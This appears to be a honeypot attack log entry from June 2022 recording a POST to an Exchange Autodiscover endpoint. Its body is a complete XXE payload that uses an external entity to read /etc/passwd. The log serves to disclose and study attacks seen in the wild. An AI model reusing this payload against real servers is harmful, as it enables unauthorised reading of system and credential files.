Attack Report Detail

Header

Time: 2022/06/14, 23:55:56 (GMT)
Transaction ID: BTL5EYU0UUCMMZ5X
Service: https
Location: RU (Russia)
Attacker: 185.7.214.104
Classification: Web script control
Harm Potential: Medium
Description: Web based executable script control

Content

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: ***.***.***.***:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

All details come from the honeypot central database.
